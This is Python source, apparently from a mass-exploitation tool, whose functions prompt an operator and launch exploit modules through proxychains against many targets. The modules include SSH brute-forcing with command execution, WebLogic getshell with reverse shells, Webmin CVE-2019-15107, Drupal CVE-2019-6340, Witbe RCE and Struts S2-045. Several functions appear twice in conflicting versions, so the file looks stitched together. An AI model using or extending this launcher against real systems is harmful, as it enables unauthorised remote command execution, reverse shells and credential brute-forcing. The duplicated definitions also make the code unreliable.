def ssh_bruteforcer(session):
    """Collect a password-list path and a command, then build the SSH job.

    Prompts the operator for both values, prints a preview of the worker
    command line and hands everything to ``core.Scanner``.

    Args:
        session: Passed through unchanged as the last ``core.Scanner`` argument.

    Returns:
        The ``core.Scanner(...)`` result, or ``None`` when the supplied
        password-list path is not an existing file.
    """
    wordlist_path = console.input_check(
        "[*] Password list file to use: ", allow_blank=False)

    if os.path.isfile(wordlist_path):
        remote_command = console.input_check(
            "[*] Command to exec: ", allow_blank=False)

        module_name = 'ssh_bruteforce.py'
        job_count = 100

        # NOTE(review): both answers are joined and then re-split on
        # whitespace, so a path or command containing spaces becomes several
        # argv entries instead of one.
        worker_args = str(wordlist_path + ' ' + remote_command).split()

        # Preview only. The real launch happens inside core.Scanner, which is
        # not visible here -- confirm it matches this proxychains4 line.
        preview = 'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(
            module_name, ' '.join(worker_args))
        print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END,
              preview)

        return core.Scanner(
            '/ssh-bruteforce/', module_name, worker_args, job_count, session)

    console.print_error("[-] Password list not found")
    return None
def ssh_bruteforcer(session):
    """Prompt for a password list and a command, then build the SSH job.

    The password-list prompt is given the ``*.txt`` files found under
    ``core.MECROOT + "/data"`` as its ``choices``. The selected path and the
    command are forwarded as separate argv entries (``-p`` / ``-c``), so
    neither value is split on whitespace at this layer.

    Args:
        session: Passed through unchanged as the last ``core.Scanner`` argument.

    Returns:
        The ``core.Scanner(...)`` result, or ``None`` when the chosen
        password-list path is not an existing file.
    """
    colors.colored_print('\n[*] Welcome to SSH bruteforcer', colors.BLUE)

    wordlist_path = console.input_check(
        "[*] Password list file to use (put them under ./data): ",
        allow_blank=False,
        choices=glob.glob(core.MECROOT+"/data/*.txt"))

    # Checked again here; presumably input_check does not guarantee the
    # answer is one of the offered choices -- verify against console.
    if os.path.isfile(wordlist_path):
        remote_command = console.input_check(
            "[*] Command to exec: ", allow_blank=False)

        module_name = 'ssh_bruteforce.py'
        worker_args = ["-p", wordlist_path, "-c", remote_command]
        job_count = 100

        return core.Scanner(
            '/ssh-bruteforce/', module_name, worker_args, job_count, session)

    console.print_error("[-] Password list not found")
    return None
def weblogic(session):
    """Interactively assemble arguments for ``weblogic.py`` and build its job.

    Asks for the server port, the target OS (``w``/``l``) and whether a
    reverse shell is wanted. Depending on that answer it asks either for a
    receiver IP and port or for a command, then builds the argv list.

    Args:
        session: Passed through unchanged as the last ``core.Scanner`` argument.

    Returns:
        The ``core.Scanner(...)`` result, or ``None`` when the OS answer is
        neither ``w`` nor ``l`` (compared case-insensitively).
    """
    print(colors.BLUE + '\n[*] Welcome to Weblogic getshell exploit' + colors.END)

    server_port = console.input_check(
        "[?] What's the port of Welogic server? ", check_type=int)
    os_type = console.input_check(
        '[?] Windows or Linux? [w/l] ', choices=['w', 'l'])
    wants_shell = console.input_check(
        '[?] Do you need a reverse shell? [y/n] ', choices=['y', 'n']) == 'y'

    if wants_shell:
        shell_server = console.input_check(
            "[?] What's the IP of shell receiver? ",
            allow_blank=False, ip_check=True)
        port = console.input_check(
            "[?] What's the port of shell receiver? ", check_type=int)

        mode_by_os = {
            'w': 'reverse_shell -os win',
            'l': 'reverse_shell -os linux',
        }
        mode = mode_by_os.get(os_type.lower())
        if mode is None:
            console.print_error('[-] Invalid input')
            return None

        flag_string = '-l {} -p {} -P {} --silent -T '.format(
            shell_server, port, server_port) + mode
        custom_args = flag_string.split()
    else:
        cmd = console.input_check(
            '[?] What command do you want to execute on the target? ',
            allow_blank=False).strip()

        template_by_os = {
            'w': '-P {} --silent -T exploit -c {} -os win',
            'l': '-P {} --silent -T exploit -c {} -os linux',
        }
        template = template_by_os.get(os_type.lower())
        if template is None:
            # Unlike the reverse-shell branch, no error is printed here.
            return None

        # NOTE(review): the command is interpolated and then split on
        # whitespace, so a multi-word command is spread over several argv
        # entries and words starting with '-' look like separate options.
        custom_args = template.format(server_port, cmd).split()

    job_count = 100
    return core.Scanner('/weblogic/', 'weblogic.py', custom_args, job_count, session)
def webmin_cve_2019_15107(session):
    """Prompt for a command and build the Scanner job for ``webmin.py``.

    The command is forwarded as one argv entry after ``-c``; it is not split
    or otherwise processed at this layer.

    Args:
        session: Passed through unchanged as the last ``core.Scanner`` argument.

    Returns:
        The ``core.Scanner(...)`` result.
    """
    colors.colored_print('\n[*] Welcome to Webmin CVE-2019-15107', colors.BLUE)

    target_command = console.input_check(
        '[?] Command to execute on the target: ', allow_blank=False)

    module_name = 'webmin.py'
    worker_args = ["-c", target_command]
    job_count = 50

    return core.Scanner('/webmin/', module_name, worker_args, job_count, session)
def witbe(session):
    """Prompt for a receiver IP and port and build the job for ``witbe.py``.

    The IP prompt is issued with ``ip_check=True`` and the port prompt with
    ``check_type=int``. Both answers are forwarded as separate argv entries.

    Args:
        session: Passed through unchanged as the last ``core.Scanner`` argument.

    Returns:
        The ``core.Scanner(...)`` result.
    """
    colors.colored_print('\n[*] Welcome to Witbe RCE', colors.BLUE)

    receiver_host = console.input_check(
        '[?] IP of your shell server: ', ip_check=True)
    receiver_port = console.input_check('[?] and Port? ', check_type=int)

    module_name = 'witbe.py'
    # NOTE(review): receiver_port is placed in the argv list exactly as
    # input_check returned it; confirm whether that is a str or an int.
    worker_args = ["-l", receiver_host, "-p", receiver_port]
    job_count = 50

    return core.Scanner('/witbe/', module_name, worker_args, job_count, session)
def drupal_cve20196340(session):
    """Prompt for a command and build the job for ``cve-2019-6340_cmd.py``.

    The command is forwarded as one argv entry after ``-c``.

    Args:
        session: Passed through unchanged as the last ``core.Scanner`` argument.

    Returns:
        The ``core.Scanner(...)`` result.
    """
    colors.colored_print('\n[*] Welcome to Drupal CVE-2019-6340', colors.BLUE)

    target_command = console.input_check(
        '[?] Command to execute on the target: ', allow_blank=False)

    module_name = 'cve-2019-6340_cmd.py'
    worker_args = ["-c", target_command]
    job_count = 50

    # NOTE(review): this call passes an extra positional 0.1 between the job
    # count and the session; its meaning is defined by core.Scanner, which is
    # not visible here.
    return core.Scanner(
        '/drupal/', module_name, worker_args, job_count, 0.1, session)
def weblogic_cve201710271(session):
    """Prompt for a command and build the job for ``weblogic_cve-2017-10271.py``.

    The command is forwarded as one argv entry after ``-c``.

    Args:
        session: Passed through unchanged as the last ``core.Scanner`` argument.

    Returns:
        The ``core.Scanner(...)`` result.
    """
    colors.colored_print(
        '\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE)

    target_command = console.input_check(
        '[?] Command to execute on the target: ', allow_blank=False)

    module_name = 'weblogic_cve-2017-10271.py'
    worker_args = ["-c", target_command]
    job_count = 50

    return core.Scanner('/weblogic/', module_name, worker_args, job_count, session)
def witbe(session):
    """Prompt for a receiver IP and port and build the job for ``witbe.py``.

    Prints a preview of the worker command line before returning.

    Args:
        session: Passed through unchanged as the last ``core.Scanner`` argument.

    Returns:
        The ``core.Scanner(...)`` result.
    """
    print(colors.BLUE + '\n[*] Welcome to Witbe RCE' + colors.END)

    # The host prompt carries no ip_check here, so this function does not ask
    # input_check to validate the answer as an IP address.
    receiver_host = console.input_check('[?] IP of your shell server: ')
    receiver_port = console.input_check('[?] and Port? ', check_type=int)

    module_name = 'witbe.py'
    # NOTE(review): string concatenation assumes input_check returns the port
    # as a str even with check_type=int -- confirm; an int would raise
    # TypeError here. The joined string is then split on whitespace.
    flag_string = '-l ' + receiver_host + ' -p ' + receiver_port
    worker_args = str(flag_string).split()
    job_count = 50

    # Preview only. The real launch happens inside core.Scanner, which is not
    # visible here.
    banner = colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END
    launch_line = 'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(module_name)
    print(banner, launch_line, ' '.join(worker_args))

    return core.Scanner('/witbe/', module_name, worker_args, job_count, session)
def s2_045(session):
    """Prompt for the target port and build the job for ``s2_045_cmd.py``.

    Prints a preview of the worker command line before returning.

    Args:
        session: Passed through unchanged as the last ``core.Scanner`` argument.

    Returns:
        The ``core.Scanner(...)`` result.
    """
    print(colors.BLUE + '\n[*] Welcome to S2-045' + colors.END)

    target_port = console.input_check(
        "[?] What's the port of your target server? ", check_type=int)

    module_name = 's2_045_cmd.py'
    # NOTE(review): concatenation assumes input_check returns the port as a
    # str even with check_type=int -- confirm; an int would raise TypeError.
    worker_args = str('-p ' + target_port).split()
    job_count = 100

    # Preview only. The real launch happens inside core.Scanner, which is not
    # visible here.
    launch_line = 'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(
        module_name, ' '.join(worker_args))
    print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END,
          launch_line)

    # The working directory is spelled '/structs2/' in the original.
    return core.Scanner('/structs2/', module_name, worker_args, job_count, session)
def weblogic_cve201710271(session):
    """Prompt for a command and target OS, then build the job for
    ``weblogic_cve-2017-10271.py``.

    The command and the OS choice are forwarded as separate argv entries
    (``-c`` / ``-os``).

    Args:
        session: Passed through unchanged as the last ``core.Scanner`` argument.

    Returns:
        The ``core.Scanner(...)`` result.
    """
    colors.colored_print('\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE)

    target_command = console.input_check(
        '[?] Command to execute on the target: ', allow_blank=False)
    # NOTE(review): the prompt text promises a default of linux, but no
    # default is passed from here; whether a blank answer maps to "linux"
    # depends on console.input_check -- confirm.
    os_choice = console.input_check(
        "[?] Target OS, default to linux [linux/win]: ",
        choices=["linux", "win"])

    module_name = 'weblogic_cve-2017-10271.py'
    worker_args = ["-c", target_command, "-os", os_choice]
    job_count = 50

    # NOTE(review): this call passes an extra positional 0.1 between the job
    # count and the session; its meaning is defined by core.Scanner, which is
    # not visible here.
    return core.Scanner(
        '/weblogic/', module_name, worker_args, job_count, 0.1, session)